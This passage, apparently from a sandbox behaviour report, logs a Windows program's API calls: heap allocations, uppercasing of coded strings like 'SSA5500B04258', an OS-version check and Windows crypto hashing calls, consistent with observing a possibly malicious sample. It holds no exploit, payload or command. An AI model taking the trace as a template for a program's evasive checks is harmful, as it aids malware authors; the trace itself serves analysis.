hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.547] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.548] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.549] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.549] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.550] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.550] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.550] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.552] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.552] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.553] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.553] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.553] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.553] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.553] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.553] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.554] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.555] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.555] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0190.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.556] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.556] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.557] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.557] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.557] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.557] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.557] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.557] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.558] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.558] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.558] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.558] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.558] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.558] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.558] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.558] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.558] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.558] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.558] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.559] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.559] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.559] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.559] CharLowerBuffW 